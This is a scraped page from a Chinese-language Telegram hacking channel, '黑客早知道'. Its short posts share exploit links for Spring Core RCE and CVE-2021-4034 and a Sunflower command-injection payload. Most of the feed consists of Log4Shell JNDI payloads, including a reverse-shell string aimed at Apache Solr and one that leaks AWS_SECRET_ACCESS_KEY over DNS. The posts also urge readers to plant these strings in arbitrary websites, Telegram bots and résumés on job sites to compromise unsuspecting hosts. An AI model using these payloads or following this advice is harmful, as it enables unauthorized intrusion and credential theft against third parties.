黑客早知道 @csrinfo Channel on Telegram

黑客早知道

@csrinfo


黑客早知道 (Chinese)

黑客早知道是一个专注于网络安全和信息技术的Telegram频道。如果你对黑客技术、网络攻防、数据安全感兴趣,那么这个频道绝对不容错过。频道提供最新的安全漏洞和攻击技术的资讯,帮助用户了解网络世界中的最新动态。通过及时更新的内容,用户可以提高对网络安全的认识,并学习如何保护自己的数据免受黑客攻击。无论您是个人用户还是企业安全专家,黑客早知道都将为您提供有价值的信息和资源。加入黑客早知道,保护您的网络安全,了解黑客世界的最新动向。

黑客早知道

08 Feb, 07:15


Chatgpt Puls申请教程

黑客早知道

31 Mar, 01:42


这个POC基本差不多: https://github.com/dinosn/spring-core-rce/blob/main/test.py

黑客早知道

31 Mar, 01:37


spring core rce是真的,class随意控制,玩法非常多

黑客早知道

29 Mar, 16:02


那个exe带vmp壳的poc, 是木马😅

黑客早知道

29 Mar, 15:36


来了来了 RCE他又来了

黑客早知道

17 Feb, 06:50


/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+" + cmd)

黑客早知道

17 Feb, 06:49


向日葵🌻就是个命令拼接漏洞

黑客早知道

15 Feb, 00:58


😂

黑客早知道

26 Jan, 06:12


😂

黑客早知道

26 Jan, 03:52


几小时前新出炉的Linux“几乎”通杀提权:https://github.com/arthepsy/CVE-2021-4034

黑客早知道

11 Jan, 01:15


rockyou.txt

黑客早知道

29 Dec, 01:50


CVE-2021-44832 : 骂谁呢

黑客早知道

13 Dec, 00:54


#log4j 礼物: apache solr EXP

/solr/admin/collections?action=${jndi:ldap://xxx/Basic/ReverseShell/ip/9999}&wt=json

黑客早知道

12 Dec, 10:50


log4j礼物🎁继续派送:${jndi:ldap://${env:AWS_SECRET_ACCESS_KEY}.你的域名.com} ,大家放开脑洞,比如还有哪些可爱的环境变量呢?

黑客早知道

11 Dec, 11:04


大家给各tg bot发这些payload,也有可能拿下他们哦😂😂😂 刚试了几个知名bot都成功了

黑客早知道

11 Dec, 10:27


教大家怎么玩吧,很简单:http://www.dnslog.cn/ 点击getsubdomain,一键生成域名,比如是abc.dnslog.cn

将这个域名放进payload,比如:

${${::-j}ndi:rmi://abc.dnslog.cn/ass}

${jndi:rmi://abc.dnslog.cn}

${${lower:jndi}:${lower:rmi}://abc.dnslog.cn/poc}

在各大网站、系统能输入的地方都发、写入这些串,然后在dnslog页面刷新等结果就好了

黑客早知道

11 Dec, 10:01


大家把log4j2的串放在各大招聘网站的简历中试试,你可能会上线一堆主机(爬你简历的公司)😢